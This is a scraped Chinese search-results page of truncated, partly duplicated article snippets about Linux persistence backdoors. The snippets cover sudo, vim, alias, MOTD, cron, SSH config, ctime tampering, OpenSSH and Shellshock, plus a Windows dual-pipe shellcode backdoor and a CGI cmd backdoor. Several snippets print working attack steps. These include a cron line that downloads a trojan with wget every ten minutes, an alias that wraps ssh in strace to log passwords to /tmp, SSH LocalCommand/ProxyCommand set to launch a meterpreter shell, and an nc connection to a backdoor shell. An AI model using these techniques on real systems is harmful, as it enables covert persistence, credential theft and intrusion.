首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

sudo 后门Linux 后门系列

sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门方法,其中也涉及一个sudo...有趣特性,在极端条件下可能是系统薄弱点;同时涉及一个没什么人关注小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 身份(以及权限)执行部分(或全部) 程序...,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门 这个后门更偏向于一个概念性后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 时候关注到...plugin 后门 1) 简介 大家日常可能使用 sudo 比较多,但实际上去完整读一读它 man 手册估计不多,其实 sudo 在 1.8 版本之后开始支持插件了,还支持了 Python 版本

43510
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Vim 后门 | Linux 后门系列

    Linux 环境变量,当然 vim 也是可以使用 Linux 环境变量 通过在vim底线命令模式中 echo $变量名 来获取 vim 配置文件地址 因此,在 Ubuntu...删除掉刚刚配置 $VIMRUNTIME 内容,采用 Linux 环境变量方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统环境变量来 因此永久修改 VIMRUNTIME...制作后门文件 1) 下载源代码 在相同版本 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 注释 在主机 B 上下载 vim 源代码(可以指定版本...3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样方法,技术含量不高,简单粗暴,但是偶尔也会被应急人员忽略...它提供了与 Python 3 无缝集成,使你能够编写、运行和调试 Python 代码 vim 与 python3 主要通过以下三个命令或函数进行交互(从留后门角度看) 1) python3 或 py3

    67651

    alias后门 | Linux 后门系列

    /etc/profile 【系统级】Linux是一个多用户操作系统。...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...把strace输出单独写到指定文件 /tmp/sshpwd-xxx.log ,这个没啥好说 -e read,write,connect Linux内核目前有300多个系统调用,详细列表可以通过...可以看到我们之前提交数据,同时呢,这个文件返回内容也比较多,只要改一个好点名字可能会让安全管理人员认为是正常文件 这种后门场景就是用户登录到这台主机上后,使用这台主机ssh去远程连接其他主机才能引发后门...后门 ?

    7.6K30

    MOTD 后门引发思考 | Linux 后门系列

    ,是Linux中发送问候消息功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务功能,这个功能脚本几乎都是使用root 权限来启动,所以很适合用来做后门 实用部分 随着关注我们朋友越来越多.../etc/update-motd.d/这个目录下 这些脚本动态组合成了我们上面看到那么 Banner 信息 这些文件只允许 root 用户编辑,所以使用此后门需要先获取root权限 留后门 这个目录下所有文件在任意用户登录后都会执行一遍...,所以我们可以选择新建一个脚本或者修改其中脚本来完成留后门目的 以 00-header 文件为例 #!...结果发现 MOTD 服务配置文件是空,空配置文件是无法启动一项服务 但是刚才我们设置后门时候明明是正常,所以我猜测可能服务名字不叫 MOTD ,而是 MOTD-XXX 好巧不巧是...,之后执行我们命令 其实这部分内容在之前研究其他后门时候就已经探究过了,但是考虑很多兄弟没看过之前文章,所以这次重提一下 这个点说透以后,能用来做后门可就不止 motd 这一个组件了,你可以想象一下

    7.8K00

    1.6 编写双管道ShellCode后门

    此外,本文还将通过使用汇编语言一步步来实现这个可被注入ShellCode后门,并以此提高代码通用性。最终,我们将通过一个实际漏洞攻击场景来展示如何利用这个后门实现内存注入攻击。...匿名管道是一种临时管道,只能用于父子进程之间或兄弟进程之间通信。它是一个双向、无名、半双工通道,只能在创建它进程及其子进程之间进行通信。...如果命名管道为空,则函数会阻塞等待数据到来,当接收到数据时则读者即可通过调用ReadFile在管道中读取数据,或调用WriteFile来向管道写入数据,至此关键API函数已经介绍完了;1.6.2 C语言实现双管道后门其实匿名管道反弹...工具执行nc 127.0.0.1 830则可连接到该后门内部,并以此获得一个Shell后门,此时读者可执行任意命令,输出效果如下图所示;图片1.6.3 汇编实现并提取ShellCode在之前文章中我们介绍了如何使用...C语言创建一个双管道通信后门,而对于在实战中,往往需要直接注入后门到内存,此时将后门转换为ShellCode是一个不错选择,首先为了保证文章篇幅不宜过长,此处暂且不考虑生成汇编代码通用性,首先我们需要得到在当前系统中所需要使用函数动态地址

    28141

    SSH Config 后门Linux 后门系列

    LC_MEASUREMENT SendEnv LC_IDENTIFICATION LC_ALL LANGUAGE SendEnv XMODIFIERS 这里着重介绍两个参数,剩下参数可以查看下面这个文档...config file syntax and how-tos for configuring the OpenSSH client LocalCommand 参数含义:当连接远程主机成功后,在本地计算机执行命令...设置~/.ssh/config 中Host为*处设置 LocalCommand 参数为我们msf恶意命令,同时设置 PermitLocalCommand 值为 yes,并保存 ?...LocalCommand参数可用 ProxyCommand 连接主机过程中设置代理所使用命令 重复过程不再赘述,仅写标题 msf设置监听 创建 ~/.ssh/config 如果.ssh目录不存在就创建这个目录...设置~/.ssh/config 中Host为*处设置 ProxyCommand 参数为执行我们恶意脚本,并保存 ssh连接其他主机 成功获取meterpreter shell ProxyCommand

    7.9K40

    1.6 编写双管道ShellCode后门

    此外,本文还将通过使用汇编语言一步步来实现这个可被注入ShellCode后门,并以此提高代码通用性。最终,我们将通过一个实际漏洞攻击场景来展示如何利用这个后门实现内存注入攻击。...匿名管道是一种临时管道,只能用于父子进程之间或兄弟进程之间通信。它是一个双向、无名、半双工通道,只能在创建它进程及其子进程之间进行通信。...语言实现双管道后门 其实匿名管道反弹CMD工作原理可以理解为,首先攻击机发命令并通过Socket传给目标机父进程,目标机父进程又通过一个匿名管道传给子进程,这里子进程是cmd.exe,CMD执行命令后...netcat工具执行nc 127.0.0.1 830则可连接到该后门内部,并以此获得一个Shell后门,此时读者可执行任意命令,输出效果如下图所示; 1.6.3 汇编实现并提取ShellCode 在之前文章中我们介绍了如何使用...C语言创建一个双管道通信后门,而对于在实战中,往往需要直接注入后门到内存,此时将后门转换为ShellCode是一个不错选择,首先为了保证文章篇幅不宜过长,此处暂且不考虑生成汇编代码通用性,首先我们需要得到在当前系统中所需要使用函数动态地址

    16920

    计划任务后门 | Linux 后门系列

    Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预情况下运行作业 PS: 功能较为简单at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!).../* 每隔10分钟下载一下我们木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用 首先介绍一下日志问题,Ubuntu 16.04...这种利用方法巧妙在使用了windows中 \r( Linux 中显示为M),导致显示截断,从而隐藏我们真实计划任务,我们使用crontab -e 可以看到真实计划任务如下: ?...,但是如果访问一个linux.org域名,ubuntu.com.cn域名,那么就没有那么奇怪了 微博这种我们可能还能插一插手,发一发微博,之后让服务器来读取,执行,但是像ubuntu这样域名我们很难插上一脚

    6.8K50

    修改后门ctime | Linux 后门系列

    0x00 前情提要 在 alias 后门Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...改变更新文件时间戳应用运行状态 从字面意思看,我们可以找到维护Linux文件时间戳应用,之后对应用本身进行修改,这听起来就是一个十分困难和危险操作 简单一点,就是停止运行系统,通过较为底层层面去修改目标文件...所以可以查看 stat 源代码,看一下 stat 应用是如何获取和管理 ctime ,针对其调用方法进行系统性地修改应该也是可以实现修改文件 ctime 0x03 系统时钟与硬件时钟 Linux...详细知识可以查看鸟哥网站 http://cn.linux.vbird.org/linux_server/0440ntp.php 查看系统时钟 date 查看硬件时钟 sudo hwclock --show

    5.7K20

    C语言CGI编程二 - 编写cmd后门

    C语言CGI编程二 - 编写cmd后门 接着C语言CGI编程入门(一),这次来介绍一个C语言库,叫“CGIC”,这是他们官网:http://www.boutell.com/cgic/    ...里面该说都说很清楚。...今天我们来用它来做一个后门,将后门放在有执行cgi权限服务器上,通过客户端POST命令到cgi上并执行,达到控制服务器目的。     首先下载官网上压缩包。...(另外两个c文件是演示用,还有一个makefile是linux下使用,在VS2010中我没有用到它)     从官方文档和下载cgictest.c可以看到,这个库里有main函数。...我这个cmd后门代码如下: int cgiMain() { cgiHeaderContentType("text/html"); char szPost[256]; cgiFormString

    2K20

    Linux常见持久化后门汇总

    0x00:前言 持久化后门是指当入侵者通过某种手段拿到服务器控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性入侵,简单梳理一下日常遇见windows用比较多一些持久化方式方便以后排查问题使用...Linux 0x01:SSH 一、ssh软连接 SSH软连接后门原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去...进程注入 原理上来说,是通过获取其它进程并修改它,一般是通过操作系统所提供调试接口来实现, 在linux中具有调试功能工具有ptrace、Gdb、radare2、strace等,...衍生另外一个技巧 "linux一种无文件后门技巧" 文章参考链接 https://kevien.github.io/2018/02/20/linux%E4%B8%80%E7%A7%8D%E6%97%...A0%E6%96%87%E4%BB%B6%E5%90%8E%E9%97%A8%E6%8A%80%E5%B7%A7%28%E8%AF%91%E6%96%87%29/ 0x06:动态链接库后门Linux

    4K30

    Linux渗透之Shellshock后门

    -6271 详细情况:Bash(GNU Bourne-Again Shell)是大多数Linux系统以及Mac OS X v10.4默认shell,它能运行于大多数Unix风格操作系统之上,甚至被移植到了...Bash其广泛使用将意味全球至少 150 万主机将受到影响,此外 Linux/Unix 世界内安卓和苹果都难以幸免。...漏洞原理: Bash 4.3以及之前版本在处理某些构造环境变量时存在安全漏洞,向环境变量值内函数定义后添加多余字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意shell命令...,甚至完全控制目标系统 受到该漏洞影响bash使用环境变量是通过函数名称来调用,以“(){”开头通过环境变量来定义。...而在处理这样“函数环境变量”时候,并没有以函数结尾“}”为结束,而是一直执行其后shell命令 受影响版本: ?

    1.8K00

    Linux常见持久化后门汇总

    0x00:前言 持久化后门是指当入侵者通过某种手段拿到服务器控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性入侵,简单梳理一下日常遇见windows用比较多一些持久化方式方便以后排查问题使用...Linux 0x01:SSH 一、ssh软连接 SSH软连接后门原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去...进程注入 原理上来说,是通过获取其它进程并修改它,一般是通过操作系统所提供调试接口来实现, 在linux中具有调试功能工具有ptrace、Gdb、radare2、strace等,...衍生另外一个技巧 "linux一种无文件后门技巧" 文章参考链接 https://kevien.github.io/2018/02/20/linux%E4%B8%80%E7%A7%8D%E6%97%...A0%E6%96%87%E4%BB%B6%E5%90%8E%E9%97%A8%E6%8A%80%E5%B7%A7%28%E8%AF%91%E6%96%87%29/ 0x06:动态链接库后门Linux

    65930

    Linux OpenSSH后门添加与防范

    小编说:相对于Windows,Linux操作系统密码较难获取。...不过很多Linux服务器配置了OpenSSH服务,在获取root权限情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号和密码,甚至可以留下一个隐形后门,达到长期控制Linux...很多入侵者在攻破一个Linux系统后,都会在系统中留下后门,用OpenSSH留后门是入侵者惯用方式之一。...准备Linux虚拟机 准备Linux虚拟机Centos 6.4。 4. 查看SSH当前版本信息 目前网上支持SSH后门版本为5.9以下。...可以找到以读写方式记录在文件中SSH后门密码文件位置,并通过该方法判断是否存在SSH后门。当然,也有不记录密码,而仅仅留下一个万能SSH后门情况。

    2.5K30

    Linux渗透之Shellshock后门

    -6271 详细情况:Bash(GNU Bourne-Again Shell)是大多数Linux系统以及Mac OS X v10.4默认shell,它能运行于大多数Unix风格操作系统之上,甚至被移植到了...Bash其广泛使用将意味全球至少 150 万主机将受到影响,此外 Linux/Unix 世界内安卓和苹果都难以幸免。...漏洞原理: Bash 4.3以及之前版本在处理某些构造环境变量时存在安全漏洞,向环境变量值内函数定义后添加多余字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意shell命令...,甚至完全控制目标系统 受到该漏洞影响bash使用环境变量是通过函数名称来调用,以“(){”开头通过环境变量来定义。...而在处理这样“函数环境变量”时候,并没有以函数结尾“}”为结束,而是一直执行其后shell命令 受影响版本: WeiyiGeek. ---- 0x01 测试和利用 1.判断方法

    1.3K20
    领券